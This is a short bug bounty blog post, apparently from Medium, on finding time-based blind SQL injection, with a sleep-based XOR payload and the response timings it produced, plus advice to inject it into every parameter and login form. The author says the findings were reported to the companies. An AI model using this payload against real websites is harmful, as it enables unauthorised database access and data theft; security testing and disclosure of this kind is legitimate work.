How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company

What is SQL injection (SQLi)?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

I will show you my method to find SQL injection in one photo I hacked all this company in this way and reported in hacker and by email to the company
it’s easy to find SQL injection on the website just we need (burp) to test on the website now see these photos

whit is this command ? why we use this ?

if you add sleep(12) the response time needs 12 seconds to browse the webpage and if you add sleep(20) the browser and the burp response after 20-second show you response and page

  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.508
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.543
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.523
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.565
  • 0"XOR(if(now()=sysdate(),sleep(3),0))XOR”Z => 3.518
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.502
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.491
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.508
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.695

I use this schedule to find SQL injection and I hacked 20 company from this methods

and another way to find SQL injection put this command in all parameters and login forms

I’m here

lu3ky13 is on @buymeacoffee! 🎉

You can support by buying a coffee ☕️ here —
https://www.buymeacoffee.com/lu3ky13

https://hackerone.com/lu3ky-13

https://twitter.com/lu3ky13

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Wizard x CHAD Partnership

The Great Migration

Cybersecurity Checklist: What Every Small Business Should Know

The Age of Cybercrime

✨pSTAKE Token Sale Register Whitelist on CoinList🔥

{UPDATE} Million Onion Hotel Hack Free Resources Generator

PRESALE IS LIVE NOW!

What is Data Privacy Day?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmad A Abdulla

Ahmad A Abdulla

More from Medium

SVG based Stored XSS

Interesting Stored XSS

Mutation XSS

XSS Attacks